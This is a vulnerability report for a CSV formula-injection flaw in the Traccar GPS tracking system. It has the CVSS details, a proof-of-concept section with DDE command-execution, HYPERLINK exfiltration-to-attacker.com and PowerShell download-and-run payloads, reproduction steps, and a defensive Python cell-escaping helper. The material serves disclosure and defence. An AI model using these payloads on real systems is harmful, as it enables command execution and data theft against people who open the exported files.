Security Vulnerability Report
CVE-2026-27644 CVSS 6.5 MEDIUM

Published: 2026-05-05 13:16:28
Last Modified: 2026-05-08 20:04:39

Description

Traccar is an open source GPS tracking system. In versions between 6.11.1 and 6.13.0, the CSV export functionality writes position data, including user-controlled device and computed attributes, to CSV output without proper escaping. An attacker can inject spreadsheet formulas through exported fields. When a manager or administrator opens the exported CSV file in spreadsheet software, this can cause formula execution and lead to command execution or data exfiltration. This has been patched in version 6.13.0.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:traccar:traccar:*:*:*:*:*:*:*:* - VULNERABLE
Affected version range: Traccar 6.11.1 (inclusive) up to, but not including, 6.13.0 (the fixed release)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept for CVE-2026-27644 (CSV Injection)
# An attacker with low privileges can inject a formula into a device attribute.

# Payload 1: Windows Command Execution (using DDE)
payload_cmd = "=cmd|' /C calc'!A0"

# Payload 2: Data Exfiltration (exfiltrating cell content to remote server)
payload_exfil = "=HYPERLINK(\"http://attacker.com/steal?data=\"&A2,\"Click here\")"

# Payload 3: PowerShell Execution
payload_psh = "=MSEXCEL|'\\..\\..\\..\\..\\Windows\\System32\\cmd.exe /c powershell -c IEX(New-Object Net.WebClient).DownloadString(\"http://evil.com/shell.ps1\")'!'!'"

# Steps to reproduce:
# 1. Login to Traccar as a regular user.
# 2. Go to device settings and update the 'Unique ID' or a custom attribute to one of the payloads above.
# 3. Ask an administrator to export the positions/reports to CSV.
# 4. When the admin opens the CSV in Excel, the formula executes.
print(f"Payload to inject: {payload_cmd}")
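As a defender-side counterpart, added here and not taken from Traccar's code or from the PoC above: a Python CSV export helper that neutralizes formula-leading cells, the CWE-1236 class of mitigation the advisory calls for. The escaping rule (prepend a single quote when a string starts with `=`, `+`, `-`, `@`, tab or carriage return, and quote every field) and all function and sample names are assumptions, not Traccar's actual patch.

```python
import csv
import io

# Leading characters that make spreadsheet software evaluate a cell as a
# formula; tab and carriage return cover the leading-whitespace variant.
FORMULA_PREFIXES = ("=", "+", "-", "@", "\t", "\r")


def neutralize_cell(value):
    """Return a value that a spreadsheet will render as plain text.

    Assumed mitigation (not Traccar's patch): only strings are touched, so
    numeric columns such as a negative speed stay numbers; a string that
    starts with a formula prefix gets a single quote prepended.
    """
    if value is None:
        return ""
    if not isinstance(value, str):
        return value
    if value.startswith(FORMULA_PREFIXES):
        return "'" + value
    return value


def export_positions(rows, fieldnames):
    """Write position rows (list of dicts) to CSV text with every cell neutralized.

    QUOTE_ALL also stops a crafted value from spilling into a neighbouring cell.
    """
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=fieldnames,
                            quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writeheader()
    for row in rows:
        writer.writerow({k: neutralize_cell(row.get(k)) for k in fieldnames})
    return buf.getvalue()


def demo():
    # Constructed sample rows: one attribute starts with a formula character.
    rows = [
        {"deviceId": 1, "attribute": "=2+2", "speed": -3.5},
        {"deviceId": 2, "attribute": "plain text", "speed": 0},
    ]
    return export_positions(rows, ["deviceId", "attribute", "speed"])


if __name__ == "__main__":
    print(demo())
```

Opening the output in a spreadsheet shows `'=2+2` as literal text in the attribute column while the speed column still sorts numerically.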

References

https://github.com/traccar/traccar/blob/v6.11.1/src/main/java/org/traccar/reports/CsvExportProvider.java#L89-L91 (Product)
https://github.com/traccar/traccar/security/advisories/GHSA-745r-9qgj-x7m7 (Exploit, Vendor Advisory, Mitigation)

Weakness: CWE-1236